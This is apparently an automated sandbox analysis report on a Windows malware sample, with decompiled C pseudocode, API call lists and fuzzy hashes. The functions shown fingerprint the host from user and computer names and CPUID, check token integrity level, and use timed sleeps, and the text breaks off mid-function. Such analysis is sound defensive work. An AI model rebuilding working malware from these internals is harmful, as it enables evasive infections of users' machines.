0x02bd553a
0x02bd553f
0x00000000
0x00000000
0x02bd5541
0x02bd5544
0x02bd5547
0x02bd554a
0x00000000
0x02bd554c
0x02bd555b
0x02bd555b
0x00000000
0x02bd5589
0x02bd5589
0x02bd558e
0x02bd55ad
0x02bd55af
0x02bd55b4
0x02bd55b5
0x00000000
0x02bd5590
0x02bd5590
0x02bd5596
0x00000000
0x02bd5598
0x02bd5598
0x02bd559d
0x02bd559f
0x02bd55a4
0x02bd55a5
0x02bd55bb
0x02bd55bb
0x02bd55c3
0x02bd55ce
0x02bd55d1
0x02bd55dc
0x02bd55de
0x02bd55e1
0x02bd55e3
0x00000000
0x02bd55e9
0x00000000
0x02bd55e9
0x02bd55e3
0x02bd5596
0x00000000
0x02bd558e
0x02bd555e
0x02bd5560
0x02bd5563
0x02bd5564
0x02bd5564
0x02bd5568
0x02bd5572
0x02bd5572
0x02bd5578
0x02bd557b
0x02bd557b
0x02bd5581
0x02bd5581
0x02bd55fe
0x00000000

APIs

memset.NTDLL ref: 02BD5476
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BD5482
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BD54A7
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02BD54C3
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD54DC
HeapFree.KERNEL32(00000000,00000000), ref: 02BD5572
CloseHandle.KERNEL32(?), ref: 02BD5581
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BD55BB
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02BD53C9,?), ref: 02BD55D1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD55DC

Part of subcall function 02BD502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,067493A8,?,00000000,30314549,00000014,004F0053,06749364), ref: 02BD511A
Part of subcall function 02BD502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD54EF), ref: 02BD512C

GetLastError.KERNEL32 ref: 02BD55EE

Strings

@MtNt, xrefs: 02BD55EE
Ut, xrefs: 02BD5572

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut$@MtNt
API String ID: 3521023985-969920318
Opcode ID: ce908d8a94de422d7b295d5be2cf60baa5b59a12a4c75f086640308a922d098f
Instruction ID: fe314d4862e3118bb9667f66391dc5d809e7819a626b7fe33e2b70beeb8c8346
Opcode Fuzzy Hash: ce908d8a94de422d7b295d5be2cf60baa5b59a12a4c75f086640308a922d098f
Instruction Fuzzy Hash: 5A516AB1C02229ABCF21DFA4DC44EEEBFB9EF09364F604656E454E2180E7309650CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3598, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02BD3598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02BDAECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2bdd2e0; // 0x3b6a5a8
				_t5 = _t13 + 0x2bde876; // 0x6748e1e
				_t6 = _t13 + 0x2bde59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02BDABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x2bdd2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02bd3598
0x02bd35a0
0x02bd35a4
0x02bd35aa
0x02bd35af
0x02bd35b4
0x02bd35b7
0x02bd35ba
0x02bd35bf
0x02bd35c0
0x02bd35c3
0x02bd35c8
0x02bd35cf
0x02bd35d9
0x02bd35db
0x02bd35dc
0x02bd35df
0x02bd35fb
0x02bd3601
0x02bd3605
0x02bd3653
0x02bd3607
0x02bd3614
0x02bd3624
0x02bd362c
0x02bd363e
0x02bd3642
0x00000000
0x00000000
0x02bd362e
0x02bd3631
0x02bd3636
0x02bd3638
0x02bd3638
0x02bd3616
0x02bd3618
0x02bd3644
0x02bd3645
0x02bd3645
0x02bd3614
0x02bd365a

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02BD529C,?,?,4D283A53,?,?), ref: 02BD35A4
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BD35BA
_snwprintf.NTDLL ref: 02BD35DF
CreateFileMappingW.KERNELBASE(000000FF,02BDD2E4,00000004,00000000,00001000,?), ref: 02BD35FB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BD529C,?,?,4D283A53), ref: 02BD360D
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02BD3624
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BD529C,?,?), ref: 02BD3645
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BD529C,?,?,4D283A53), ref: 02BD364D

Strings

@MtNt, xrefs: 02BD364D

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MtNt
API String ID: 1814172918-3251738875
Opcode ID: 636ac0b09089b8e70b0086809e3ddf1bbb49e4ce0187888a6fc9cf2ea101ec84
Instruction ID: 621d2b7ad2f9f45edfcf735396aeeb72cd7424028048a6948854bddf971dbe43
Opcode Fuzzy Hash: 636ac0b09089b8e70b0086809e3ddf1bbb49e4ce0187888a6fc9cf2ea101ec84
Instruction Fuzzy Hash: 2621F076A81204BBD711AF64CC05FCD3BA9AB44784F2501A6F606E72C1FB70DA01CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02BDA82B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02BDA82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2bdd2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02BD60B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2bdd2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2bdd270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02BD789B(_v8 + _v8, _t64);
							}
							HeapFree( *0x2bdd270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2bdd270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02BD789B(_v8 + _v8, _t64);
						}
						HeapFree( *0x2bdd270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02bda82b
0x02bda833
0x02bda837
0x02bda83a
0x02bda83f
0x02bda841
0x02bda846
0x02bda846
0x02bda84c
0x02bda84e
0x02bda85b
0x02bda8bc
0x02bda85d
0x02bda862
0x02bda868
0x02bda86d
0x02bda87b
0x02bda87f
0x02bda88e
0x02bda895
0x02bda89c
0x02bda89c
0x02bda8a7
0x02bda8a7
0x02bda87f
0x02bda86d
0x02bda8be
0x02bda8c4
0x02bda8ce
0x02bda8d0
0x02bda8d5
0x02bda8e4
0x02bda8e8
0x02bda8f3
0x02bda8fa
0x02bda901
0x02bda901
0x02bda90d
0x02bda90d
0x02bda8e8
0x02bda918
0x02bda91a
0x02bda91d
0x02bda91f
0x02bda922
0x02bda925
0x02bda92f
0x02bda933
0x02bda937

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02BDA862
RtlAllocateHeap.NTDLL(00000000,?), ref: 02BDA879
GetUserNameW.ADVAPI32(00000000,?), ref: 02BDA886
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BD538B), ref: 02BDA8A7
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BDA8CE
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02BDA8E2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BDA8EF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BD538B), ref: 02BDA90D

Strings

Ut, xrefs: 02BDA8A7, 02BDA90D

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
Opcode ID: 6e7115b609f0e6dfc93289b9da1da68c085f6dea95055e2dffd57145852fa73d
Instruction ID: 3cc4e2160abcec1a72ec5f7e1b0acf3d66fd1173c99e603ddbc84e7f9a410586
Opcode Fuzzy Hash: 6e7115b609f0e6dfc93289b9da1da68c085f6dea95055e2dffd57145852fa73d
Instruction Fuzzy Hash: F8313D72A81206EFDB10DFA9DD90BAEBBF9FB44240F514469E545D3200FB30EA119B50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4151, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD4151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2bdd294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02BD75F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02BD4AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02bd415e
0x02bd4165
0x02bd416c
0x02bd4180
0x02bd418b
0x02bd41a3
0x02bd41b0
0x02bd41b3
0x02bd41b8
0x02bd41c3
0x02bd41c7
0x02bd41d6
0x02bd41da
0x02bd41f6
0x02bd41f6
0x02bd41fa
0x02bd41fa
0x02bd41ff
0x02bd4203
0x02bd4209
0x02bd420a
0x02bd4211
0x02bd4217

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BD4183
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02BD41A3
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02BD41B3
CloseHandle.KERNEL32(00000000), ref: 02BD4203

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02BD41D6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BD41DE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BD41EE

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 28b3d6db68b7d0fea777516051e12906d31fec17b6c04649ba9c7120eb85b470
Instruction ID: 9d8da052034791a770b812ef1bb9645d866c20f16d8137e6e5793fbbfe4421d3
Opcode Fuzzy Hash: 28b3d6db68b7d0fea777516051e12906d31fec17b6c04649ba9c7120eb85b470
Instruction Fuzzy Hash: 6F215976D00209FFEB009F94DC84EEEBBB9EB48344F0040A6E950A3151E7718A55EB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD262F, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02BD262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2bdd270 = _t10;
				if(_t10 != 0) {
					 *0x2bdd160 = GetTickCount();
					_t12 = E02BD1A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L02BDB02E();
							_t34 = _t14 + _t16;
							_t18 = E02BD4F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E02BD27C7(_t26) != 0) {
							 *0x2bdd298 = 1; // executed
						}
						_t12 = E02BD520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x02bd262f
0x02bd2635
0x02bd2636
0x02bd2642
0x02bd2648
0x02bd264f
0x02bd265f
0x02bd2664
0x02bd266b
0x02bd266d
0x02bd2672
0x02bd2678
0x02bd267e
0x02bd2688
0x02bd268c
0x02bd268e
0x02bd2693
0x02bd2694
0x02bd2695
0x02bd269a
0x02bd26a0
0x02bd26ab
0x02bd26ac
0x02bd26b2
0x02bd26b8
0x02bd26c4
0x02bd26c6
0x02bd26c6
0x02bd26d0
0x02bd26d0
0x02bd2651
0x02bd2653
0x02bd2653
0x02bd26da

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02BD1900,?), ref: 02BD2642
GetTickCount.KERNEL32 ref: 02BD2656
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02BD1900,?), ref: 02BD2672
SwitchToThread.KERNEL32(?,00000001,?,?,?,02BD1900,?), ref: 02BD2678
_aullrem.NTDLL(?,?,00000013,00000000), ref: 02BD2695
Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,02BD1900,?), ref: 02BD26B2

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 206a3946506485fc1d56063135bcaca4824523e0b9eb43e2c9d0f755ecede718
Instruction ID: 5e13284322f22e1432d1cf5afc174682756390f1500602dca712d6a4ae86b81b
Opcode Fuzzy Hash: 206a3946506485fc1d56063135bcaca4824523e0b9eb43e2c9d0f755ecede718
Instruction Fuzzy Hash: 2511E976E813056BD7205B74DC19FDA7BA8EB44391F404565FE59C7280FBB0D850CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD9311, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02BD9311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2bdd364; // 0x67495b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2bdd364; // 0x67495b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2bdd030) {
					HeapFree( *0x2bdd270, 0, _t8);
				}
				_t9 = E02BD5141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x2bdd364; // 0x67495b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x02bd9311
0x02bd9311
0x02bd931a
0x02bd932a
0x02bd932a
0x02bd932f
0x02bd9334
0x00000000
0x00000000
0x02bd9324
0x02bd9324
0x02bd9336
0x02bd933a
0x02bd934c
0x02bd934c
0x02bd9357
0x02bd935c
0x02bd935f
0x02bd9364
0x02bd9368
0x02bd936e

APIs

RtlEnterCriticalSection.NTDLL(06749570), ref: 02BD931A
Sleep.KERNEL32(0000000A,?,02BD5390), ref: 02BD9324
HeapFree.KERNEL32(00000000,00000000,?,02BD5390), ref: 02BD934C
RtlLeaveCriticalSection.NTDLL(06749570), ref: 02BD9368

Strings

Ut, xrefs: 02BD934C

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 95ec3ca41a75c9c7b553cc787edc1a470bad670b0ed3741b64968548a5c43c60
Instruction ID: 47e2cc6a5056b9b52926a0c91fdff840057ac4fc0ff7597284e0d8af864ec494
Opcode Fuzzy Hash: 95ec3ca41a75c9c7b553cc787edc1a470bad670b0ed3741b64968548a5c43c60
Instruction Fuzzy Hash: 33F05E72E82642ABD7249F64DD58F8A3FA8FF04390B44C855F581C7190F320D860CB14

Uniqueness

Uniqueness Score: -1.00%

Function 02BD520D, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02BD520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02BD154A();
				if(_t21 != 0) {
					_t59 =  *0x2bdd294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2bdd294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2bdd12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02BD21DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2bdd2e0; // 0x3b6a5a8
					if( *0x2bdd294 > 5) {
						_t8 = _t26 + 0x2bde5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2bde9f9; // 0x44283a44
						_t27 = _t7;
					}
					E02BD11F4(_t27, _t27);
					_t31 = E02BD3598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2bdd2a8 =  *0x2bdd2a8 ^ 0x81bbe65d;
						_t32 = E02BD75F6(0x60);
						 *0x2bdd364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2bdd364; // 0x67495b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2bdd364; // 0x67495b0
							 *_t51 = 0x2bde823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2bdd270, 0, 0x43);
							 *0x2bdd300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2bdd294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2bdd2e0; // 0x3b6a5a8
								_t13 = _t58 + 0x2bde55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2bdc2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02BDA82B( ~_v8 &  *0x2bdd2a8, 0x2bdd00c); // executed
								_t42 = E02BD4C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02BD74A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02BD5461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E02BD3FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2bdd128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02BD5AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x02bd520d
0x02bd5218
0x02bd521b
0x02bd521e
0x02bd5221
0x02bd5228
0x02bd522a
0x02bd5236
0x02bd5238
0x02bd5238
0x02bd5241
0x02bd5247
0x02bd524c
0x02bd5266
0x02bd5272
0x02bd5274
0x02bd5279
0x02bd5283
0x02bd5283
0x02bd527b
0x02bd527b
0x02bd527b
0x02bd527b
0x02bd528a
0x02bd5297
0x02bd529e
0x02bd52a3
0x02bd52a3
0x02bd52ab
0x02bd52ae
0x02bd52d4
0x02bd52e0
0x02bd52e5
0x02bd52ea
0x02bd52ec
0x02bd5318
0x02bd531a
0x02bd52ee
0x02bd52f2
0x02bd52f7
0x02bd52fc
0x02bd5303
0x02bd5309
0x02bd530e
0x02bd5314
0x02bd531b
0x02bd531d
0x02bd531f
0x02bd532e
0x02bd5334
0x02bd5339
0x02bd533b
0x02bd536b
0x02bd536d
0x02bd533d
0x02bd533d
0x02bd5343
0x02bd5350
0x02bd5356
0x02bd5356
0x02bd535e
0x02bd5367
0x02bd536e
0x02bd5370
0x02bd5372
0x02bd5379
0x02bd5386
0x02bd538b
0x02bd5390
0x02bd5392
0x02bd5394
0x00000000
0x00000000
0x02bd5396
0x02bd539b
0x02bd539d
0x02bd53a4
0x02bd53a8
0x02bd53ab
0x02bd53c0
0x02bd53c4
0x02bd53c9
0x00000000
0x02bd53c9
0x02bd53ad
0x02bd53af
0x00000000
0x00000000
0x02bd53ba
0x02bd53bc
0x02bd53be
0x00000000
0x00000000
0x00000000
0x02bd53be
0x02bd53a1
0x02bd53a1
0x02bd5372
0x02bd52b0
0x02bd52b0
0x02bd52b5
0x02bd53cb
0x02bd53cf
0x02bd53d7
0x02bd53d7
0x00000000
0x02bd53cf
0x02bd52bb
0x02bd52be
0x02bd52c8
0x02bd52cf
0x00000000
0x02bd53df
0x02bd53df
0x02bd53e3
0x02bd53e7
0x02bd53e7

APIs

Part of subcall function 02BD154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,02BD5226,00000000,00000000), ref: 02BD1559

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02BD52A3

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

memset.NTDLL ref: 02BD52F2
RtlInitializeCriticalSection.NTDLL(06749570), ref: 02BD5303

Part of subcall function 02BD3FC2: memset.NTDLL ref: 02BD3FD7
Part of subcall function 02BD3FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02BD4019
Part of subcall function 02BD3FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02BD4024

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BD532E
wsprintfA.USER32 ref: 02BD535E

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: d58cb87af8aca798c70f289151b1549ee98b741f4e169682604c333c34d5410e
Instruction ID: 0c5498d3e4842f1f65cabbf5eb796afdfb0e7647cc33dd05d5588f0149d198f5
Opcode Fuzzy Hash: d58cb87af8aca798c70f289151b1549ee98b741f4e169682604c333c34d5410e
Instruction Fuzzy Hash: 62513672E81215AFDB30ABA0CCA4BEE77A8EB04764F8448A6E586D7140F7B0D554CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02BD78E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E02BD78E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
